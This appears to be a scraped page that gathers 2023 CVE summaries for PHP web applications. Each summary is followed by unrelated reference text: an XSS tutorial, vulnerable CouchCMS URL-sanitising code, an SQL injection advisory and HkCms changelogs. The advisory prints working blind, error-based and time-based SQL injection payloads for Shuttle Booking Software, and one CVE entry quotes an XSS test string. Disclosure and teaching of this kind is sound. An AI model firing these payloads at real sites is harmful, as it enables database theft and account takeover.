Schoolmate 1.3 is vulnerable to SQL Injection in the variable $schoolname from Database at ~\header.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40944: vulnerability-report/Schoolmate_CVE-2023-40944 at main · KLSEHB/vulnerability-report

Multiple cross-site scripting (XSS) vulnerabilities in Dairy Farm Shop Management System Using PHP and MySQL v1.1 allow attackers to execute arbitrary web scripts and HTML via a crafted payload injected into the Category and Category Field parameters.

In this section, we'll explain what cross-site scripting is, describe the different varieties of cross-site scripting vulnerabilities, and spell out how to find and prevent cross-site scripting.

**What is cross-site scripting (XSS)?**

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

**How does XSS work?**

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

**Labs**

If you're already familiar with the basic concepts behind XSS vulnerabilities and just want to practice exploiting them on some realistic, deliberately vulnerable targets, you can access all of the labs in this topic from the link below.

*   View all XSS labs

**XSS proof of concept**

You can confirm most kinds of XSS vulnerability by injecting a payload that causes your own browser to execute some arbitrary JavaScript. It's long been common practice to use the alert() function for this purpose because it's short, harmless, and pretty hard to miss when it's successfully called. In fact, you solve the majority of our XSS labs by invoking alert() in a simulated victim's browser.

Unfortunately, there's a slight hitch if you use Chrome. From version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling alert(). As these are used to construct some of the more advanced XSS attacks, you'll sometimes need to use an alternative PoC payload. In this scenario, we recommend the print() function. If you're interested in learning more about this change and why we like print(), check out our blog post on the subject.

As the simulated victim in our labs uses Chrome, we've amended the affected labs so that they can also be solved using print(). We've indicated this in the instructions wherever relevant.

**What are the types of XSS attacks?**

There are three main types of XSS attacks. These are:

*   Reflected XSS, where the malicious script comes from the current HTTP request.
*   Stored XSS, where the malicious script comes from the website's database.
*   DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

**Reflected cross-site scripting**

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Here is a simple example of a reflected XSS vulnerability:

https://insecure-website.com/status?message=All+is+well.
<p>Status: All is well.</p>

The application doesn't perform any other processing of the data, so an attacker can easily construct an attack like this:

https://insecure-website.com/status?message=<script>/*+Bad+stuff+here...+*/</script>
<p>Status: <script>/* Bad stuff here... */</script></p>

If the user visits the URL constructed by the attacker, then the attacker's script executes in the user's browser, in the context of that user's session with the application. At that point, the script can carry out any action, and retrieve any data, to which the user has access.

**Stored cross-site scripting**

Stored XSS (also known as persistent or second-order XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

The data in question might be submitted to the application via HTTP requests; for example, comments on a blog post, user nicknames in a chat room, or contact details on a customer order. In other cases, the data might arrive from other untrusted sources; for example, a webmail application displaying messages received over SMTP, a marketing application displaying social media posts, or a network monitoring application displaying packet data from network traffic.

Here is a simple example of a stored XSS vulnerability. A message board application lets users submit messages, which are displayed to other users:

<p>Hello, this is my message!</p>

The application doesn't perform any other processing of the data, so an attacker can easily send a message that attacks other users:

<p><script>/* Bad stuff here... */</script></p>

**DOM-based cross-site scripting**

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

In the following example, an application uses some JavaScript to read the value from an input field and write that value to an element within the HTML:

var search = document.getElementById('search').value;
var results = document.getElementById('results');
results.innerHTML = 'You searched for: ' + search;

If the attacker can control the value of the input field, they can easily construct a malicious value that causes their own script to execute:

You searched for: <img src=1 onerror='/* Bad stuff here... */'>

In a typical case, the input field would be populated from part of the HTTP request, such as a URL query string parameter, allowing the attacker to deliver an attack using a malicious URL, in the same manner as reflected XSS.

**What can XSS be used for?**

An attacker who exploits a cross-site scripting vulnerability is typically able to:

*   Impersonate or masquerade as the victim user.
*   Carry out any action that the user is able to perform.
*   Read any data that the user is able to access.
*   Capture the user's login credentials.
*   Perform virtual defacement of the web site.
*   Inject trojan functionality into the web site.

**Impact of XSS vulnerabilities**

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example:

*   In a brochureware application, where all users are anonymous and all information is public, the impact will often be minimal.
*   In an application holding sensitive data, such as banking transactions, emails, or healthcare records, the impact will usually be serious.
*   If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.

**How to find and test for XSS vulnerabilities**

The vast majority of XSS vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner.

Manually testing for reflected and stored XSS normally involves submitting some simple unique input (such as a short alphanumeric string) into every entry point in the application, identifying every location where the submitted input is returned in HTTP responses, and testing each location individually to determine whether suitably crafted input can be used to execute arbitrary JavaScript. In this way, you can determine the context in which the XSS occurs and select a suitable payload to exploit it.

Manually testing for DOM-based XSS arising from URL parameters involves a similar process: placing some simple unique input in the parameter, using the browser's developer tools to search the DOM for this input, and testing each location to determine whether it is exploitable. However, other types of DOM XSS are harder to detect. To find DOM-based vulnerabilities in non-URL-based input (such as document.cookie) or non-HTML-based sinks (like setTimeout), there is no substitute for reviewing JavaScript code, which can be extremely time-consuming. Burp Suite's web vulnerability scanner combines static and dynamic analysis of JavaScript to reliably automate the detection of DOM-based vulnerabilities.

**Content security policy**

Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities. If an application that employs CSP contains XSS-like behavior, then the CSP might hinder or prevent exploitation of the vulnerability. Often, the CSP can be circumvented to enable exploitation of the underlying vulnerability.

**Dangling markup injection**

Dangling markup injection is a technique that can be used to capture data cross-domain in situations where a full cross-site scripting exploit is not possible, due to input filters or other defenses. It can often be exploited to capture sensitive information that is visible to other users, including CSRF tokens that can be used to perform unauthorized actions on behalf of the user.

**How to prevent XSS attacks**

Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data.

In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:

*   **Filter input on arrival.** At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
*   **Encode data on output.** At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
*   **Use appropriate response headers.** To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
*   **Content Security Policy.** As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.

**Common questions about cross-site scripting**

**How common are XSS vulnerabilities?** XSS vulnerabilities are very common, and XSS is probably the most frequently occurring web security vulnerability.

**How common are XSS attacks?** It is difficult to get reliable data about real-world XSS attacks, but it is probably less frequently exploited than other vulnerabilities.

**What is the difference between XSS and CSRF?** XSS involves causing a web site to return malicious JavaScript, while CSRF involves inducing a victim user to perform actions they do not intend to do.

**What is the difference between XSS and SQL injection?** XSS is a client-side vulnerability that targets other application users, while SQL injection is a server-side vulnerability that targets the application's database.

**How do I prevent XSS in PHP?** Filter your inputs with a whitelist of allowed characters and use type hints or type casting. Escape your outputs with htmlentities and ENT_QUOTES for HTML contexts, or JavaScript Unicode escapes for JavaScript contexts.

**How do I prevent XSS in Java?** Filter your inputs with a whitelist of allowed characters and use a library such as Google Guava to HTML-encode your output for HTML contexts, or use JavaScript Unicode escapes for JavaScript contexts.

CVE-2023-41593: What is cross-site scripting (XSS) and how to prevent it? | Web Security Academy

An open redirect vulnerability in the sanitize_url() parameter of CouchCMS v2.3 allows attackers to redirect a victim user to an arbitrary web site via a crafted URL.

The function sanitize_url() used to filter urls in /couch/functions.php does not set strict filtering rules.I found that the code does not filter \\ characters.Although https:\\www.bing.com is not a legitimate request,the URL of the request will be checked and corrected in the browser,resulting in the URL being corrected to https://www.bing.com, resulting in the vulnerability.

function sanitize\_url( $url, $default\='', $only\_local\=0 ){
    $url = trim( $url );
    $default = trim( $default );

    if( strlen($url) ){
        // Only chars permitted to remain unencoded in urls remain
        $url = preg\_replace( array('/</', '/>/', '/"/', '/\\x00+/'), array('', '', '', ''), $url );
        $url = preg\_replace( '|\[^a-z0-9:#@%/;,\\'$()~\_?\\+-=\\\\\\.&!\]|i', '', $url );

        // remove newlines
        $newlines = array('%0d', '%0D', '%0a', '%0A');
        $found = true;
        while( $found == true ){
            $val\_before = $url;
            for( $i = 0; $i < count($newlines); $i++ ){
                $url = str\_replace( $newlines\[$i\], '', $url );
            }
            if( $val\_before == $url ){ $found = false; }
        }

        if( strlen($url) ){
            if( $only\_local ){ // don't allow redirects external to our site
                if( !strlen($default) ) $default\=K\_SITE\_URL;

                if( strpos($url, '//')!==false ){
                    if( strpos($url, K\_SITE\_URL)!==0 ){
                        $url = $default;
                    }
                }
                elseif( strpos($url, '/\\\\')===0 ){
                    $url = $default;
                }
            }
        }
        else{
            $url = $default;
        }
    }
    else{
        $url = $default;
    }

    return $url;
}

CVE-2023-41609: CouchCMS v2.3 exists an open redirect vulnerability · Issue #190 · CouchCMS/CouchCMS

Shuttle Booking Software version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Title: Shuttle-Booking-Software-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 09/10/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing## Reference: https://portswigger.net/web-security/sql-injection## Description:The location_id parameter appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the location_id parameter,and a database error message was returned. Two single quotes were thensubmitted and the error message disappeared.The attacker easily can steal all information from the database ofthis web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: location_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND 1347=1347 AND ('MVss'='MVss&traveling=from    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (GTID_SUBSET)    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT(ELT(9416=9416,1))),0x71706b7071),9416) AND('dOqc'='dOqc&traveling=from    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND('EEYQ'='EEYQ&traveling=from---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)## Time spent:01:47:00

Shuttle Booking Software 1.0 SQL Injection

In PHPJabbers Cleaning Business Software 1.0, there is no encryption on user passwords allowing an attacker to gain access to all user accounts.

CVE-2023-36140

HKcms v2.3.0.230709 is vulnerable to Cross Site Scripting (XSS) allowing administrator cookies to be stolen.

**HkCms是否会收取授权费用？**

HkCms免费开源，无需授权，永久商用，在您遵守《HkCms软件许可使用协议》下可将HkCms开源内容管理系统用于商业。

从ShuipFCms到LvYeCms，再到HkCms，我们从未停下为建站行业提供优秀的免费开源内容管理系统的初心，我们希望将免费开源进行到底。

各位网友务必在遵守国家法律法规的前提下使用HkCms开源内容管理系统，禁止使用HkCms开源内容管理系统进行任何违法犯罪的活动，使用HkCms开源内容管理系统过程中产生的任何版权纠纷及法律责任由使用方承担。

一个优秀的开源内容管理系统离不开网友的建议、帮助和支持，我们希望与广大网友一起完善我们的开源内容管理系统，在使用过程中有任何的建议和思路都可以通过QQ群：808251031 向我们反馈。

版本号：HkCms\_v2.3.0.230709

*   提示： 1. 本次升级会更改到数据库，升级前，请备份好站点(请备份好站点、请备份好站点、请备份好站点)。 2. 本次升级大范围覆盖请备份好修改的模板。 3. 手动升级参考：https://www.hkcms.cn/help/azbs/167.html 4. 若你调整过HkCms代码，请不要升级 5. 升级遇到问题请Q群(808251031)、联系技术QQ:746117169 【新增】 采用新的多语言维护界面 【新增】 lang标签用于指定语言下才显示内容 【调整】 调整内容多语言同步机制 【调整】 调整默认编辑器宽度问题 【调整】 多语言获取标签调整 【调整】 前台多语言列表调整 【调整】 ThinkPHP核心升级到V6.1.3
*   【优化】 优化后台复选框组件 【优化】 优化应用中心账号获取方式 【优化】 多语言同步优化
*   【修复】 修复前台无法权限控制问题 【修复】 修复会员管理启用禁用异常问题 【修复】 修复数字组件在内容管理添加时无法保存小数 【修复】 修复留言表单无法删除问题 【修复】 修复静态生成验证码无法显示问题 【修复】 修复栏目管理新增可能出现parent\_id不存在问题 【修复】 修复同步多语言时栏目管理有上下级时未能正常同步 【修复】 修复index\_url方法在静态生成时无法正常隐藏入口文件 【修复】 修复静态生成的留言表单地址不对 【修复】 修复静态生成验证码地址异常问题 【修复】 修复静态生成列表内容下一页多语言情况下页码不对问题 【修复】 修复会员组无法修复权限规则问题 【修复】 修复会员无法修改头像问题

升级包(包含补丁)

**补丁1：230712 下载**

提示：

1).本次升级不会改到数据库

**1\. 升级内容**

【修复】修复内容管理无法正常显示栏目

【修复】修复语言列表新增到其他语言未能同步

【修复】修复语言列表时间显示问题

【修复】修复安装无法显示正常的演示数据

**2\. 升级会覆盖以下文件**

app/admin/controller/BaseController.php

app/admin/controller/routine/Lang.php

app/common/model/lang/Lang.php

app/install/Index.php

config/ver.php

**补丁2：230726 下载**

提示：

1).本次升级不会改到数据库

**1\. 升级内容**

【修复】 修复搜索页提交参数不对

【新增】 支持复制模型时主表的部分字段属性支持复制

【修复】 修复模型字段 发布时间 不能正常修改问题

【修复】 修改模板配置立即生效

【修复】 修复复制或移动文章部分栏目不能正常显示

【调整】 调整内容管理文章操作更新缓存

**2\. 升级会覆盖以下文件**

app/admin/controller/cms/Model.php

app/admin/controller/Appcenter.php

app/admin/controller/cms/Archives.php

app/admin/controller/cms/Single.php

app/admin/model/cms/Archives.php

app/admin/model/cms/Single.php

app/api/controller/Ems.php

app/api/lang/zh-cn.php

app/common/services/cache/CacheService.php

app/common/services/cms/ArchivesService.php

extend/libs/table/TableOperate.php

config/ver.php

**补丁3：230813 下载**

提示：

本次升级不会更改到数据库。

**1\. 升级内容**

【修复】 XSS漏洞修复

【修复】 修复主题切换缓存问题

【修复】 修复附件管理ICO格式图片不显示问题

【修复】 修复模型文件字段选择文件异常

**2\. 升级会覆盖以下文件**

app/admin/model/auth/AdminLog.php

app/admin/controller/Appcenter.php

template/admin/adminlte/routine/attachment/select.html

public/static/common/js/table.js

config/ver.php

版本号：HkCms\_v2.2.4.230206

*   提示： 1. 本次升级会更改到数据库，升级前，请备份好站点(请备份好站点、请备份好站点、请备份好站点)。 2. 本次升级会重置URL伪静态，如果你更改过，升级后需要重新设置。 3. 若你安装了会员中心与TAG标签插件，请卸载后再升级。 4. 本地升级不会覆盖模板与插件。 5. 手动升级参考：https://www.hkcms.cn/help/azbs/167.html 6. 升级遇到问题请Q群(808251031)联系技术 【新增】 默认集成TAG标签功能，无需安装TAG插件。 【新增】 默认集成会员中心 【新增】 内容页面支持标签内链、标签管理支持多语言 【新增】 字符截取标签支持不同语言截取不同的字符长度 【调整】 全局不设置过滤函数，有需要的在\\app\\Request.php 中设置 【调整】 ThinkPHP核心升级到v6.1.1版本
*   【优化】 优化内容分页 【优化】 取消限制内容字段标题 【优化】 优化填写手机域名后的判断 【优化】 优化字段配置格式 【优化】 优化留言表单邮箱提示 【优化】 调整多语言检测机制 【优化】 优化多应用访问绑定机制 【优化】 优化默认模板 【优化】 content标签增加field字段，可控制只查询特定的字段列表，提高查询速度 【优化】 优化整站源码导出 【优化】 优化缓存机制 【优化】 优化后台管理界面 【优化】 优化为env文件开启调试模式优先级高于后台控制
*   【修复】 修正内容管理栏目排序异常 【修复】 修复模型字段可能无法修改问题 【修复】 修复标签单条获取 【修复】 修复文件大小获取异常 【修复】 修复留言表单无法访问问题 【修复】 修复本地导入模板可能导致的异常 【修复】 修复静态生成可能造成的异常 【修复】 修复动态下拉时间类型可能出现的异常 【修复】 修复自定义URL时点击量无法加1 【修复】 修复文件下载异常 【修复】 修复模板配置文件异常问题

升级包(包含补丁)

**补丁1：230313 下载**

提示：

1）本次升级不会更改到数据库。

1\. 升级内容

【优化】模板文件获取缓存优化  

【修复】修复日志排序  

【修复】修复没有副表字段时无法添加问题  

【修复】修复子管理员栏目权限获取异常  

2\. 升级会覆盖以下文件

app/admin/controller/cms/Category.php

app/admin/controller/cms/Archives.php

app/admin/model/cms/ModelFieldBind.php

template/admin/adminlte/auth/adminlog/index.html

app/common.php

config/ver.php

**补丁2：230328 下载**

提示：

本次升级不会更改到数据库。

1\. 升级内容

【优化】 优化内容管理列表有置顶属性时可修改排序

【优化】 优化模板列表缓存

【修复】 修复标签管理数据统计问题

【修复】 修复取消水印重新上传同图片无法更新问题

【修复】 修复删除没有日志记录问题

【修复】 修复会员管理模块的异常

【修复】 前台列表筛选修复多选组件下无法筛选出来的问题

【调整】 整站源码发布到应用中心规则调整

2\. 升级会覆盖以下文件

app/admin/controller/Appcenter.php

app/admin/controller/Tags.php

app/common/library/Upload.php

app/admin/model/cms/Archives.php

app/admin/controller/cms/ModelField.php

app/admin/controller/user/Group.php

app/admin/controller/user/User.php

app/admin/validate/user/UserGroup.php

public/static/common/js/table.js

config/ver.php

版本号：HkCms\_v2.2.3

*   提示：本次版本改动较大，数据库有较大的调整，所以暂不支持HkCms\_v2.2.2版本以及之前版本升级到本次版本。 1. 升级内容 【新增】 键值对数组组件新增默认模板配置，方便快速录入 【新增】 栏目标签支持获取多个指定的栏目 【新增】 新增文档链接跳转外链 【新增】 文档自定义URL别名 【新增】 搜索页新增搜索字符高亮显示 【新增】 内容标签支持多个栏目ID 【新增】 内容标签支持指定多个文档ID，指定单个文档ID 【新增】 内容标签列表默认有副表字段 【新增】 文档标题支持加粗与设置颜色 【新增】 新增文章支持副栏目 【新增】 采用全新的模型主表
*   【优化】 加强应用中心记住密码的安全性 【优化】 数据排序类型统一 【优化】 优化栏目管理上下级显示 【优化】 优化后台界面样式 【优化】 优化content标签的id条件 【优化】 优化模板升级检测 【优化】 优化本地模板读取 【优化】 优化插件js加载
*   【修复】 修复单页栏目删除后同步删除文档 【修复】 修复前台多语言切换可能失效问题 【修复】 修复模板输出替换配置不被覆盖 【修复】 修复后台菜单可能失效无法点击问题 【修复】 修复后台JS引用 【修复】 修复php think run 无法使用问题 【修复】 修复界面在火狐浏览器兼容问题 【修复】 修复单页模型第一次添加为空访问报错问题，调整为创建栏目自动生成单页数据 【修复】 修复栏目管理页面添加子栏目时模型不对 【修复】 修复栏目更改未能立即生效前台 【修复】 修复标签关闭执行多次问题 【修复】 站点模块文字链接无法拖动 【修复】 修复角色修改下拉组件异常 【修复】 修复非多语言情况下静态生成异常 【修复】 修复PHP8.0下某些异常

**补丁1：221012 下载**

提示：本次更新针对HkCms\_v2.2.3.220920版本的修复，修复将更改数据库category表weigh字段

1\. 升级内容

【修复】 修复栏目管理添加其他链接报错

【修复】 修复站点配置手动输入应用中心账号异常

【修复】 修复SEO生成静态报错

【修复】修复category表weigh字段

2\. 升级会覆盖以下文件

app/admin/controller/cms/Category.php

app/admin/controller/routine/Config.php

app/admin/controller/routine/Seo.php

app/admin/model/cms/Category.php

app/admin/library/Html.php

app/admin/lang/zh-cn/appcenter.php

app/index/model/cms/Category.php

**补丁2：221017 下载**

提示：

1）升级过程中弹出框会遮挡确认升级提示，将弹出框往两边移动即可看到确认升级提示。

2）本次升级不会更改到数据库。

1\. 升级内容

【优化】 HkCms升级页面优化

【优化】 优化创建菜单排序

【修复】 模型字段主表字段无法修改问题

【修复】 修复远程下载异常

【修复】 修复伪静态下部分页面显示index.php问题

【修复】 修复其他已知问题

2\. 升级会覆盖以下文件

app/admin/controller/routine/Attachment.php

app/admin/controller/cms/Category.php

app/admin/controller/cms/ModelField.php

app/admin/model/auth/AuthRule.php

app/admin/model/cms/ModelField.php

app/admin/lang/zh-cn/cms/modelfield.php

app/admin/validate/cms/ModelField.php

app/index/controller/Index.php

app/index/route/route.php

app/common/library/Url.php

template/admin/adminlte/appcenter/local.html

template/admin/adminlte/index/dashboard.html

public/static/module/admin/adminlte/css/adminlte.css

public/static/common/js/table.js

config/ver.php

**补丁3：221019 下载**

提示：

1）本次升级不会更改到数据库。

1\. 升级内容

【修复】 修复publish\_time字段异常

【修复】 修复验证码异常

2\. 升级会覆盖以下文件

app/admin/controller/cms/Single.php

app/admin/model/cms/Archives.php

app/admin/model/cms/Single.php

app/api/controller/Ems.php

app/index/controller/Guestbook.php

extend/libs/captcha/Captcha.php

template/admin/adminlte/index/dashboard.html

config/ver.php

**补丁4：221021 下载**

提示：

1）本次升级不会更改到数据库。

1\. 升级内容

【优化】 优化后台https访问时可能导致上传无法正常使用

【修复】 修复多语言在mysql8.0的情况显示异常

【修复】 修复channel标签中的istotal参数异常

【修复】 修复catid栏目不存在时异常

【修复】 修复位置选取插件无法选取问题  

【修复】 修复其他已知的问题

2\. 升级会覆盖以下文件

addons/address/install/static/address.js

app/admin/controller/BaseController.php

app/admin/controller/routine/Config.php

app/admin/model/routine/Config.php

app/index/taglib/hkcms/TagContent.php

template/admin/adminlte/routine/config/index.html

public/static/addons/address/address.js

public/static/common/js/form.js

public/static/common/js/hkcms.js

public/static/common/js/table.js

app/common.php

config/ver.php

CVE-2023-40786: HkCms版本更新说明、HkCms版本列表、HkCms升级日志 – HkCms开源内容管理系统

A vulnerability, which was classified as critical, was found in Beijing Baichuo Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230906. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-239358 is the identifier assigned to this vulnerability.

CVE-2023-4873

A vulnerability, which was classified as critical, has been found in SourceCodester Contact Manager App 1.0. This issue affects some unknown processing of the file add.php. The manipulation of the argument contact/contactName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239357 was assigned to this vulnerability.

CVE-2023-4872

A vulnerability classified as critical was found in SourceCodester Contact Manager App 1.0. This vulnerability affects unknown code of the file delete.php. The manipulation of the argument contact/contactName leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239356.

CVE-2023-4871

A vulnerability classified as problematic has been found in SourceCodester Contact Manager App 1.0. This affects an unknown part of the file index.php of the component Contact Information Handler. The manipulation of the argument contactID with the input "><sCrIpT>alert(1)</ScRiPt> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239355.

Tag

#php